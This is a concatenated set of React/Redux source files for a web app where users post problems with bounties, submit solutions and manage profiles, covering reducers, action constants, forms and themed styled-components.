LOGIN_REQUEST: 'AUTH_LOGIN_REQUEST',
LOGIN_SUCCESS: 'AUTH_LOGIN_SUCCESS',
LOGIN_FAILURE: 'AUTH_LOGIN_FAILURE',
LOGIN_INVALID_CREDENTIALS: 'AUTH_LOGIN_INVALID_CREDENTIALS',
LOGOUT: 'AUTH_LOGOUT',
TOKEN_VERIFY_REQUEST: 'AUTH_TOKEN_VERIFY_REQUEST',
TOKEN_VERIFIED: 'AUTH_TOKEN_VERIFIED',
TOKEN_EXPIRED: 'AUTH_TOKEN_EXPIRED'
};<file_sep>/src/styled-components/defaults/ButtonsDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonBlock = styled.div`
display: flex;
`
const TryhardRepliesButtonBlock = props => <button {...props} />
const RepliesButtonBlock = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonBlock {...props} />}
tryhard={<TryhardRepliesButtonBlock {...props} />}
/>
export default RepliesButtonBlock;
<file_sep>/src/components/problem/ProblemPage.jsx
import React from 'react';
import { connect } from 'react-redux';
import InfiniteScroll from 'react-infinite-scroller';
import QueueSidebar from '../queue/QueueSidebar'
import Problem from './ProblemPage/Problem'
import Submission from './ProblemPage/Submission'
import PostSubmission from './ProblemPage/PostSubmission'
import { problemPageActions } from '../../actions/content/problemPage'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import ProblemDiv from '../../styled-components/problem/ProblemDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = (state, ownProps) => {
const problemPageState = state.content.problemPage.page
const problem = problemPageState.problem
return {
// writted explicitly, so that submission entries is ommited
problemActive: problem ? problem.active : null,
problemOwner: ownProps.user && problem.submitted_by && ownProps.user._id === problem.submitted_by._id,
problemSolution: (problem && problem.accepted_submission) ? problem.accepted_submission._id : null,
paging: problemPageState.paging,
reply: problemPageState.reply,
submissionFormSubmitted: problemPageState.submissionFormSubmitted,
submissionEntries: problemPageState.submissionEntries,
...ownProps
}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
loadProblemData: () => dispatch(problemPageActions.loadProblemData(ownProps.problemId)),
loadSubmissionPage: (page) => dispatch(problemPageActions.loadSubmissionPage(ownProps.problemId, page)),
reset: () => dispatch(problemPageActions.reset())
})
class ProblemPage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
componentDidMount() {
this.props.loadProblemData()
}
render() {
if (this.props.problemActive === null) {
return (
<PageDiv>
<QueueSidebar />
<BackendMessage messageType={this.props.messageType}>
{this.props.message}
</BackendMessage>
</PageDiv>
)
}
// Honestly looked for this bug for 8 hours, when this statement was moved to mapStateToProps, new object is constructed every time, which results in cyclic updating
// Great infinite loop :D :D
const submissionIdentifiers = this.props.submissionEntries.reduce((acc, cv, index) => acc.concat(Object.keys(cv).map(submissionId => ({id: submissionId, page: index}))), [])
//const mergedEntries = this.props.submissionEntries.reduce((acc, cv) => Object.assign(acc,cv),{})
const postSubmissionAvailable = this.props.problemActive && this.props.loggedIn && !this.props.problemOwner && !this.props.submissionFormSubmitted
const mapSubmissionIdToComponent = (submissionEntry, index) => (
<Submission
submissionId={submissionEntry.id}
page={submissionEntry.page}
problem={this.props.problemId}
key={index}
acceptButton={this.props.problemActive && this.props.problemOwner}
replyButton={this.props.loggedIn}
loadRepliesButton={true}
hasActiveReplyForm={this.props.loggedIn && submissionEntry.id === this.props.reply}
paging={this.props.paging[submissionEntry.id]}
token={this.props.token}
isSolution={this.props.problemSolution === submissionEntry.id}
wrapper={true}
/>
)
const submissionCount = submissionIdentifiers.length
const submissions = submissionIdentifiers.map(mapSubmissionIdToComponent)
const embeddedSolution = (this.props.problemSolution && submissionCount > 1) ? (submissionIdentifiers.find(x => x.id === this.props.problemSolution) || null) : null
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<ProblemDiv>
<Problem
problemId={this.props.problemId}
loggedIn={this.props.loggedIn}
embeddedSolution={embeddedSolution}
/>
{postSubmissionAvailable && <PostSubmission token={this.props.token} problemId={this.props.problemId} />}
<div>
<InfiniteScroll
pageStart={0}
loadMore={() => this.props.loadSubmissionPage(this.props.paging.page + 1)}
hasMore={this.props.paging.hasMore}
loader={<div className="loader" key={0}>Loading ...</div>}
>
{submissions}
</InfiniteScroll>
</div>
</ProblemDiv>
</ContentDiv>
</PageDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ProblemPage)
<file_sep>/src/styled-components/form/TextAreaDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTextAreaDiv = styled.div`
margin: 10px 5px 5px 5px;
${props => props.center && 'margin: 10px auto;'}
width: 80%;
textarea {
width: 100%;
height: 100px;
}
`
const TryhardTextAreaDiv = props => <div {...props} center={undefined}/>
const TextAreaDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedTextAreaDiv {...props} />}
tryhard={<TryhardTextAreaDiv {...props} />}
/>
export default TextAreaDiv<file_sep>/src/reducers/content/profile/transactionPage.jsx
import { transactionPageConstants } from '../../../constants/content/profile/transactionPage'
const defaultState = {
entries: [],
paging: {
page: 0,
hasMore: true
}
}
function transactionPageReducer(state=defaultState, action) {
const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
switch (action.type) {
case transactionPageConstants.LOAD_TRANSACTION_PAGE_REQUEST:
return {
message: 'Loading transactions...',
loading: true,
entries: state.entries,
paging: {
page: state.paging.page
}
}
case transactionPageConstants.LOAD_TRANSACTION_PAGE_FAILED:
return {
message: action.message,
paging: {
...state.paging,
hasMore: false
},
entries: state.entries
}
case transactionPageConstants.LOAD_TRANSACTION_PAGE_SUCCESS:
const newEntries = state.entries
newEntries[activePage - 1] = action.data || []
return {
entries: newEntries.slice(0,activePage),
paging: {
// If there was no data, dont update
page: (action.data && action.data.length > 0) ? activePage : state.paging.page,
hasMore: action.hasMore
},
}
case transactionPageConstants.RESET:
return defaultState
default:
return state
}
}
export default transactionPageReducer<file_sep>/src/components/profile/ActivityPage.jsx
import React from 'react'
import { connect } from 'react-redux'
import InfiniteScroll from 'react-infinite-scroller';
import { activityPageActions } from '../../actions/content/profile/activityPage'
import { ProblemBox } from '../problem/ProblemBox'
import ProfileSidebar from './ProfileSidebar'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import ProblemBoxWrapper from '../../styled-components/problem-related/ProblemBoxWrapper'
const mapStateToProps = state => {
const pageState = state.content.profile.activityPage
return {
...pageState,
entries: pageState.entries.reduce((acc, cv) => acc.concat(cv),[]),
}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
setUser: (user) => dispatch(activityPageActions.setUser(user)),
loadPage: (user, page) => dispatch(activityPageActions.setActivePage(user, page)),
reset: () => dispatch(activityPageActions.reset())
})
class ActivityPage extends React.Component {
componentDidMount() {
this.props.setUser(this.props.user)
this.props.loadPage(this.props.user, 1)
}
componentWillUnmount() {
this.props.reset()
}
render() {
const base_url = '/u/' + this.props.user
const auth_view = (this.props.user === this.props.viewer && this.props.loggedIn)
const empty = this.props.entries.length === 0;
if (empty) {
return (
<PageDiv>
<ProfileSidebar baseUrl={base_url} auth_view={auth_view}/>
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>{this.props.loading ? "Loading" : "User " + this.props.user + " has yet no activity"}</h3>
</CenteredDiv>
</ContentDiv>
</PageDiv>
)
}
return (
<PageDiv>
<ProfileSidebar baseUrl={base_url} auth_view={auth_view}/>
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>{"Activity of user " + this.props.user}</h3>
</CenteredDiv>
<ProblemBoxWrapper>
<InfiniteScroll
pageStart={1}
loadMore={() => {
this.props.loadPage(this.props.user, this.props.paging.page + 1)
}}
hasMore={this.props.paging.hasMore}
loader={<div className="loader" key={0}>Loading ...</div>}
>
<ul>
{
this.props.entries.map((p,index) => (
<li key={index}>
<ProblemBox
id={p._id}
title={p.title}
active={p.active}
created={p.created}
bounty={p.bounty}
loggedIn={this.props.loggedIn}
viewCount={p.view_count}
submissionCount={p.submission_count}
username={p.submitted_by}
/>
</li>
))}
</ul>
</InfiniteScroll>
</ProblemBoxWrapper>
</ContentDiv>
</PageDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ActivityPage)<file_sep>/src/reducers/content/submitProblemPage.jsx
import { combineReducers } from 'redux'
import { reducer } from 'redux-form'
import { submitProblemPageConstants, submitProblemStages } from '../../constants/content/submitProblemPage'
const initialState = {
stage: submitProblemStages.SUBMITTING_PROBLEM,
queueOptions: []
}
const submitProblemPageReducer = (state = initialState, action) => {
switch (action.type) {
case submitProblemPageConstants.SUBMIT_REQUEST:
return {stage: submitProblemStages.SUBMITTING_PROBLEM, message: "Waiting for server response", messageType: action.messageType, queueOptions: state.queues}
case submitProblemPageConstants.SUBMIT_SUCCESS:
return {stage: submitProblemStages.COMPLETED, problemId: action.problem.id, message: "Problem submitted", messageType: action.messageType, queueOptions: state.queues, queue: action.queue}
case submitProblemPageConstants.SUBMIT_FAILED:
return {stage: submitProblemStages.SUBMITTING_PROBLEM, message: action.error, messageType: action.messageType, queueOptions: state.queues}
case submitProblemPageConstants.LOAD_QUEUES_REQUEST:
return {stage: state.stage, message: "Waiting for server response", messageType: action.messageType, queueOptions: state.queues}
case submitProblemPageConstants.LOAD_QUEUES_SUCCESS:
return {stage: state.stage, queueOptions: action.queues}
case submitProblemPageConstants.LOAD_QUEUES_FAILED:
return {stage: submitProblemStages.SUBMITTING_PROBLEM, message: action.error, messageType: action.messageType, queueOptions: state.queues}
case submitProblemPageConstants.RESET:
return initialState
default:
return state
}
}
const submitProblemFormReducer = reducer
export default combineReducers({
page: submitProblemPageReducer,
form: submitProblemFormReducer
})
<file_sep>/src/constants/content/statistics/economyPage.jsx
export const economyPageConstants = {
LOAD_KARMA_VALUES_REQUEST: 'LOAD_KARMA_VALUES_REQUEST',
LOAD_KARMA_VALUES_SUCCESS: 'LOAD_KARMA_VALUES_SUCCESS',
LOAD_KARMA_VALUES_FAILED: 'LOAD_KARMA_VALUES_FAILED'
};
<file_sep>/src/constants/content/confirm/registration.jsx
export const confirmRegistrationConstants = {
REQUEST: "CONFIRM_REGISTRATION_REQUEST",
SUCCESS: "CONFIRM_REGISTRATION_SUCCESS",
FAILED: "CONFIRM_REGISTRATION_FAILED"
}<file_sep>/src/components/profile/PersonalInformationPage.jsx
import React from 'react'
import { connect } from 'react-redux'
import ProfileSidebar from './ProfileSidebar'
import ChangeEmailForm from './PersonalInformationPage/ChangeEmailForm'
import ChangePasswordForm from './PersonalInformationPage/ChangePasswordForm'
import ChangeUsernameForm from './PersonalInformationPage/ChangeUsernameForm'
import ChangeNamesForm from './PersonalInformationPage/ChangeNamesForm'
import ConfirmPasswordForm from './PersonalInformationPage/ConfirmPasswordForm'
import ProfileUpdateDispatcher from './PersonalInformationPage/ProfileUpdateDispatcher'
import { personalInformationPageActions } from '../../actions/content/profile/personalInformationPage'
import { personalInformationPageStages } from '../../constants/content/profile/personalInformationPage'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.profile.personalInformationPage.page
const mapDispatchToProps = dispatch => ({
reset: () => dispatch(personalInformationPageActions.reset())
})
class PersonalInformationPage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
render() {
const message = this.props.message
const messageType = this.props.messageType
const form = this.props.form
const token = this.props.token
switch (this.props.stage) {
case personalInformationPageStages.PASSWORD_CONFIRMATION:
return (
<ContentDiv>
{'Please confirm by entering your ' + (form === 'password' ? 'current ' : '') + 'password'}
<ConfirmPasswordForm form={form} token={token} />
</ContentDiv>
)
case personalInformationPageStages.COMPLETED:
return (
<ContentDiv>
<ProfileUpdateDispatcher form={form} token={token} values={this.props.values} user={this.props.user}/>
<BackendMessage messageType={messageType}>
{message}
</BackendMessage>
</ContentDiv>
)
case personalInformationPageStages.SUBMITTING_FORM:
default:
return (
<PageDiv>
<ProfileSidebar baseUrl={'/u/' + this.props.user} auth_view/>
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<BackendMessage messageType={messageType}>
{!form && message}
</BackendMessage>
<ChangeEmailForm />
<BackendMessage messageType={messageType}>
{form === 'email' && message}
</BackendMessage>
<ChangePasswordForm />
<BackendMessage messageType={messageType}>
{form === 'password' && message}
</BackendMessage>
<ChangeUsernameForm />
<BackendMessage messageType={messageType}>
{form === 'username' && message}
</BackendMessage>
<ChangeNamesForm />
<BackendMessage messageType={messageType}>
{form === 'names' && message}
</BackendMessage>
</CenteredDiv>
</ContentDiv>
</PageDiv>
)
}
}
}
export default connect(mapStateToProps, mapDispatchToProps)(PersonalInformationPage)
<file_sep>/src/components/statistics/StatisticsSidebar.jsx
import React from "react";
import { Link } from "react-router-dom"
import SidebarDiv from '../../styled-components/sidebars/Sidebar'
import QueueSidebar from '../queue/QueueSidebar'
import QueueDropdown from '../queue/QueueDropdown'
import CollapsedSidebar from '../../styled-components/sidebars/CollapsedSidebar'
import CollapsedSidebarDiv from '../../styled-components/sidebars/CollapsedSidebarDiv'
const StatisticsSidebar = (props) => {
const routes = [
{
to: "/economy",
label: "System Economy"
},
{
to: "/scoreboard/Index",
label: "User Scoreboard"
}
]
const baseUrl = "/statistics"
const routeElements = (
<ul>
{
routes.map((entry, index) => (
<li key={index}><Link to={baseUrl + entry.to}>{entry.label}</Link></li>
))
}
</ul>
)
return (
<div>
<CollapsedSidebar>
<CollapsedSidebarDiv grow>
{routeElements}
</CollapsedSidebarDiv>
<CollapsedSidebarDiv shrink>
{props.addQueues && props.queueBaseUrl && <QueueDropdown baseUrl={props.queueBaseUrl} />}
</CollapsedSidebarDiv>
</CollapsedSidebar>
<SidebarDiv loggedIn={props.loggedIn}>
{routeElements}
{props.addQueues && props.queueBaseUrl && <QueueSidebar reuse baseUrl={props.queueBaseUrl}/>}
</SidebarDiv>
</div>
)
}
export default StatisticsSidebar<file_sep>/src/styled-components/header/ThemeDropdown.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedThemeDropdown = styled.div`
color: rgb(17,0,73);
border: 2px solid;
border-radius: 3px;
padding: 0.25em 1em;
margin: 2px 1em
:hover {
cursor: pointer;
text-decoration: underline;
}
`
const TryhardThemeDropdown = styled.div`
:hover {
cursor: pointer;
}
`
const ThemeDropdown = props => <ThemeSelector
buzzfeed={<BuzzfeedThemeDropdown {...props} />}
tryhard={<TryhardThemeDropdown {...props} />}
/>
export default ThemeDropdown<file_sep>/src/styled-components/form/ValidationMessage.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedValidationMessage = styled.div`
color: red;
`
const TryhardValidationMessage = props => <div {...props}/>
const ValidationMessage = props => <ThemeSelector
buzzfeed={<BuzzfeedValidationMessage {...props} />}
tryhard={<TryhardValidationMessage {...props} />}
/>
export default ValidationMessage<file_sep>/src/components/confirm/PasswordChange/PasswordChangeForm.jsx
import React from 'react';
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { confirmPasswordChangeActions } from '../../../actions/content/confirm/passwordChange'
import { signupActions } from '../../../actions/content/signup'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(confirmPasswordChangeActions.confirm(props.token, values.password))
}
const validate = values => {
const errors = {}
if (!values.password) {
errors.password = '<PASSWORD>'
}
if (!values.confirmPassword) {
errors.confirmPassword = '<PASSWORD>'
}
if (values.confirmPassword !== values.password) {
errors.confirmPassword = 'Passwords don\'t match'
}
return errors
}
const PasswordChangeForm = props => {
const { handleSubmit } = props;
return (<form onSubmit={handleSubmit}>
<Field name="password" component={renderField} type="password" label="Password (at least 8 characters)" alignLeft/>
<Field name="confirmPassword" component={renderField} type="password" label="Confirm password" alignLeft/>
<Button type="submit">Submit</Button>
</form>)
}
const asyncBlurFields = ['password']
export default reduxForm({
form: 'form',
validate,
asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
asyncBlurFields,
onSubmit: submit,
getFormState: ({content}) => content.confirm.passwordChange.form
})(PasswordChangeForm)<file_sep>/src/constants/content/profile/premiumPage.jsx
export const premiumPageConstants = {
SUBSCRIBE: 'PROFILE_PREMIUM_SUBSCRIBE',
UNSUBSCRIBE: 'PROFILE_PREMIUM_UNSUBSCRIBE'
}
<file_sep>/src/components/profile/ProfileAccess.jsx
import React from "react"
import { Redirect } from "react-router-dom";
import Auth from '../auth/Auth';
const ProfileAccess = ({viewer, user, resource, ...rest}) => {
if (viewer === user) {
return <Auth {...rest}/>
} else if (!!viewer) {
return <Redirect to={'/u/' + viewer + '/' + resource} />
} else {
return <Redirect to={'/u/' + user}/>
}
}
export default ProfileAccess<file_sep>/src/styled-components/profile/TransactionBoxWrapper.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBoxWrapper = styled.div`
margin-left: auto;
margin-right: auto;
width: 100%;
display: block;
li {
display: block;
left: -50px;
}
ul {
list-style-type: none;
padding: 0;
}
`
const TryhardTransactionBoxWrapper = props => <div {...props}/>
const TransactionBoxWrapper = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBoxWrapper {...props} />}
tryhard={<TryhardTransactionBoxWrapper {...props} />}
/>
export default TransactionBoxWrapper<file_sep>/src/components/signup/SignUpPage.jsx
import React from 'react';
import { connect } from 'react-redux'
import SignUpForm from './SignUpForm'
import { signupStages } from '../../constants/content/signUpPage'
import { signupActions } from '../../actions/content/signup'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.signup.page
const mapDispatchToProps = dispatch => ({
reset: () => dispatch(signupActions.reset())
})
class SignUpPage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
render() {
switch(this.props.stage) {
case signupStages.COMPLETED:
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message.message}
</BackendMessage>
<ol>
{this.props.message.steps.map((step, i) => (
<li key={i}>{step}</li>
))}
</ol>
</ContentDiv>
)
case signupStages.SUBMITTING_FORM:
default:
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message}
</BackendMessage>
<h1><NAME></h1>
<SignUpForm />
</ContentDiv>
)
}
}
}
export default connect(mapStateToProps, mapDispatchToProps)(SignUpPage)
<file_sep>/src/components/problem/BoostPage.jsx
import React from 'react';
import { connect } from 'react-redux';
import { Link } from "react-router-dom"
import BoostForm from './BoostPage/BoostForm'
import { boostActions } from '../../actions/content/boost'
import { boostStages } from '../../constants/content/boost'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = (state, ownProps) => ({
token: ownProps.token,
problemId: ownProps.problemId,
stage: state.content.boost.page.stage,
message: state.content.boost.page.message,
messageType: state.content.boost.page.messageType
})
const mapDispatchToProps = dispatch => ({
reset: () => dispatch(boostActions.reset())
})
class BoostPage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
render() {
const message = this.props.message
const messageType = this.props.messageType
const problemId = this.props.problemId
const token = this.props.token
switch(this.props.stage) {
case boostStages.COMPLETED:
return(
<ContentDiv>
<BackendMessage messageType={messageType}>
{message}
</BackendMessage>
<p>Would you like to go back to <Link to={'/problem/' + problemId}>the problem you just boosted</Link>?</p>
</ContentDiv>
)
case boostStages.BOOSTING:
default:
return(
<ContentDiv>
<CenteredDiv>
Boosting problem
</CenteredDiv>
<BoostForm problemId={problemId} token={token}/>
<BackendMessage messageType={messageType}>
{message}
</BackendMessage>
</ContentDiv>
)
}
}
}
export default connect(mapStateToProps, mapDispatchToProps)(BoostPage)
<file_sep>/src/components/profile/ProfileSidebar.jsx
import React from "react";
import { Link } from "react-router-dom"
import SidebarDiv from '../../styled-components/sidebars/Sidebar'
import CollapsedSidebar from '../../styled-components/sidebars/CollapsedSidebar'
const ProfileSidebar = (props) => {
const privateRoutes = [
{
to: "/personal",
label: "Personal Information"
},
{
to: "/premium",
label: "Premium"
},
{
to: "/transactions",
label: "Transactions"
}
]
const publicRoutes = [
{
to: "/",
label: (props.auth_view) ? "My profile page" : "Profile page"
},
{
to: "/activity",
label: "User Activity"
}
]
const routes = (props.auth_view) ? publicRoutes.concat(privateRoutes) : publicRoutes
const routeElements = (
<ul>
{
routes.map((entry, index) => (
<li key={index}><Link to={props.baseUrl + entry.to}>{entry.label}</Link></li>
))
}
</ul>
)
return (
// render both versions, only one is displayed, depends on screen size
<div>
<CollapsedSidebar>
{routeElements}
</CollapsedSidebar>
<SidebarDiv>
{routeElements}
</SidebarDiv>
</div>
)
}
export default ProfileSidebar<file_sep>/src/constants/content/queuePage.jsx
export const queuePageConstants = {
SET_ACTIVE_PAGE_REQUEST: "QUEUE_PAGE_SET_ACTIVE_PAGE_REQUEST",
SET_ACTIVE_PAGE_SUCCESS: "QUEUE_PAGE_SET_ACTIVE_PAGE_SUCCESS",
NETWORK_ERROR: "QUEUE_PAGE_NETWORK_ERROR",
SET_ACTIVE_ENTRY: "QUEUE_PAGE_SET_ACTIVE_ENTRY",
RESET: "QUEUE_PAGE_RESET_PAGES"
}
<file_sep>/src/constants/content/problemPage.jsx
export const problemPageConstants = {
LOAD_PROBLEM_DATA_REQUEST: "PROBLEM_PAGE_LOAD_PROBLEM_DATA_REQUEST",
LOAD_PROBLEM_DATA_SUCCESS: "PROBLEM_PAGE_LOAD_PROBLEM_DATA_SUCCESS",
LOAD_PROBLEM_DATA_FAILED: "PROBLEM_PAGE_LOAD_PROBLEM_DATA_FAILED",
LOAD_SUBMISSION_PAGE_REQUEST: "PROBLEM_PAGE_LOAD_SUBMISSION_PAGE_REQUEST",
LOAD_SUBMISSION_PAGE_FAILED: "PROBLEM_PAGE_LOAD_SUBMISSION_PAGE_FAILED",
LOAD_SUBMISSION_PAGE_SUCCESS: "PROBLEM_PAGE_LOAD_SUBMISSION_PAGE_SUCCESS",
LOAD_REPLY_PAGE_REQUEST: "PROBLEM_PAGE_LOAD_REPLY_PAGE_REQUEST",
LOAD_REPLY_PAGE_FAILED: "PROBLEM_PAGE_LOAD_REPLY_PAGE_FAILED",
LOAD_REPLY_PAGE_SUCCESS: "PROBLEM_PAGE_LOAD_REPLY_PAGE_SUCCESS",
HIDE_REPLIES: "PROBLEM_PAGE_HIDE_REPLIES",
POST_SUBMISSION_REQUEST: "PROBLEM_PAGE_POST_SUBMISSION_REQUEST",
POST_SUBMISSION_FAILED: "PROBLEM_PAGE_POST_SUBMISSION_FAILED",
POST_SUBMISSION_SUCCESS: "PROBLEM_PAGE_POST_SUBMISSION_SUCCESS",
REPLY_SUBMISSION_REQUEST: "PROBLEM_PAGE_REPLY_SUBMISSION_REQUEST",
REPLY_SUBMISSION_FAILED: "PROBLEM_PAGE_REPLY_SUBMISSION_FAILED",
REPLY_SUBMISSION_SUCCESS: "PROBLEM_PAGE_REPLY_SUBMISSION_SUCCESS",
ACCEPT_SUBMISSION_REQUEST: "PROBLEM_PAGE_ACCEPT_SUBMISSION_REQUEST",
ACCEPT_SUBMISSION_FAILED: "PROBLEM_PAGE_ACCEPT_SUBMISSION_FAILED",
ACCEPT_SUBMISSION_SUCCESS: "PROBLEM_PAGE_ACCEPT_SUBMISSION_SUCCESS",
SELECT_REPLY_FORM: "PROBLEM_PAGE_SELECT_REPLY_FORM",
RESET: "PROBLEM_PAGE_RESET_PAGES"
}<file_sep>/src/components/queue/SubmitProblemPage/SubmitProblemForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import MyEditor from '../../form/MyEditor'
import renderField from '../../form/RenderField'
import ReduxFormSelect from '../../form/ReduxFormSelect'
import CenteredDiv from '../../../styled-components/defaults/CenteredDiv'
import Button from '../../../styled-components/defaults/Button'
import { submitProblemActions } from '../../../actions/content/submitProblem'
const transformIntoOption = q => ({value: q, label: q})
const submit = (values, dispatch, props) => {
if (!values.queue) {
values.queue = transformIntoOption(props.defaultQueue)
}
dispatch(
submitProblemActions
.submit(
{
queue_name: values.queue.value,
title: values.title,
content: values.description
},
props.token
)
)
}
const validate = values => {
const errors = {}
if (!values.title) {
errors.title = 'Required'
}
if (!values.description) {
errors.title = 'Required'
}
return errors
}
const SubmitProblemForm = props => {
const { handleSubmit } = props;
const transformIntoOption = q => ({value: q, label: q})
let options = props.queueOptions || []
options = options.map(transformIntoOption)
return (
<form onSubmit={handleSubmit}>
<CenteredDiv>
<Field name="queue" component={ReduxFormSelect} options={options} defaultValue={transformIntoOption(props.defaultQueue)} label="Select queue"/>
<Field name="title" component={renderField} type="text" label="Title"/>
</CenteredDiv>
<Field name="description" component={MyEditor} />
<Button type="submit">Submit</Button>
</form>
)
}
export default reduxForm({
form: 'form',
onSubmit: submit,
validate,
getFormState: ({content}) => content.submitProblem.form
})(SubmitProblemForm)
<file_sep>/src/components/auth/LogoutPage.jsx
import React from 'react'
import { Redirect } from "react-router-dom";
import LogoutButton from './LogoutButton'
export default (props) => {
return !props.loggedIn ? (
<Redirect to={props.redirect} />
) : (
<div>
To access resource {props.redirect}, please
<LogoutButton loggedIn={props.loggedIn} logout={props.logout}/>
</div>
)
}<file_sep>/src/components/form/MyEditor.jsx
import React from "react"
//import SimpleMDE from "react-simplemde-editor"
//import "easymde/dist/easymde.min.css"
import MarkdownEditor from '../../styled-components/form/MarkdownEditor'
//konfiguracia: https://github.com/Ionaru/easy-markdown-editor#configuration
class MyEditor extends React.Component {
render() {
return (
<div>
{this.props.input && <MarkdownEditor options={{spellChecker: false}} onChange={this.props.input.onChange} style={{zIndex: '0'}}/>}
</div>
)
}
}
export default MyEditor
<file_sep>/src/styled-components/profile/TransactionBoxMeta.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBoxMeta = styled.ul`
display: flex;
justify-content: space-between;
flex-basis: 30px;
font-size: 11px;
list-style-type: none;
padding: 0px;
`
const TryhardTransactionBoxMeta = props => <ul {...props}/>
const TransactionBoxMeta = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBoxMeta {...props} />}
tryhard={<TryhardTransactionBoxMeta {...props} />}
/>
export default TransactionBoxMeta<file_sep>/src/styled-components/defaults/ContentDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants';
const BuzzfeedContentDiv = styled.div`
grid-area: ${props => props.sidebar ? 'content' : 'page'};
${props => props.sidebar ? `
margin-left: 10rem;
` : `
margin-left: auto;
margin-right: auto;
`}
@media(max-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
margin-left: 0;
margin-right: 0;
margin-top: 0px;
@-moz-document url-prefix() {
margin-top: 50px;
}
}
margin-top: 20px;
padding: 10px;
font-family: Verdana, sans-serif;
textarea {
border-radius: 5px;
}
form {
border-radius: 10px;
padding: 7px;
background-color: rgba(67, 0, 50, 0.35);
margin: 10px;
}
`
const TryhardContentDiv = props => <div {...props} sidebar={undefined}/>
const ContentDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedContentDiv {...props} />}
tryhard={<TryhardContentDiv {...props} />}
/>
export default ContentDiv<file_sep>/src/constants/content/profile/activityPage.jsx
export const activityPageConstants = {
SET_ACTIVE_PAGE_REQUEST: "ACTIVITY_PAGE_SET_ACTIVE_PAGE_REQUEST",
SET_ACTIVE_PAGE_SUCCESS: "ACTIVITY_PAGE_SET_ACTIVE_PAGE_SUCCESS",
SET_ACTIVE_PAGE_FAILED: "ACTIVITY_PAGE_SET_ACTIVE_PAGE_FAILED",
SET_USER: "ACTIVITY_PAGE_SET_USER",
RESET: "ACTIVITY_PAGE_RESET_PAGES"
}
<file_sep>/src/reducers/auth.jsx
import { authConstants } from '../constants/auth'
const token = localStorage.getItem('token')
const initialState = { token: token || token === "" ? token.replace(new RegExp('"(.*)"'),(match, x) => x) : null }
export function authReducer(state = initialState, action) {
switch (action.type) {
case authConstants.LOGIN_REQUEST:
return {
message: 'Logging in...',
messageType: action.messageType
};
case authConstants.LOGIN_SUCCESS:
return {
user: action.user,/*localStorage.getItem('user'),*/
token: action.token,
message: "Welcome",
messageType: action.messageType
};
case authConstants.LOGIN_FAILURE:
return {
user: action.user,
message: action.message,
messageType: action.messageType
};
// parse if status was 401, then print this, other set new state for server errorz
case authConstants.LOGIN_INVALID_CREDENTIALS:
return {
message: 'Invalid credentials',
messageType: action.messageType
};
case authConstants.LOGOUT:
return {
message: 'Logged out',
messageType: action.messageType
// possibly redirect here
}
case authConstants.TOKEN_VERIFY_REQUEST:
return {
user: state.user, // leave it here, then when accessing private resource, detects as logged out and redirects
token: state.token,
message: 'Re-logging in',
messageType: action.messageType
}
case authConstants.TOKEN_VERIFIED:
return {
user: action.user,
token: action.token,
message: "Logged In",
messageType: action.messageType
}
case authConstants.TOKEN_EXPIRED:
localStorage.removeItem('token')
return {
message: 'Session expired re-log in',
messageType: action.messageType,
token: state.token
}
default:
return state
}
}
<file_sep>/src/reducers/content/problemPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { problemPageConstants } from "../../constants/content/problemPage"
const defaultPaging = {
page: 0,
hasMore: true
}
const defaultState = {
submissionEntries: [
],
paging: defaultPaging,
problem: {
title:'...',
content:'...',
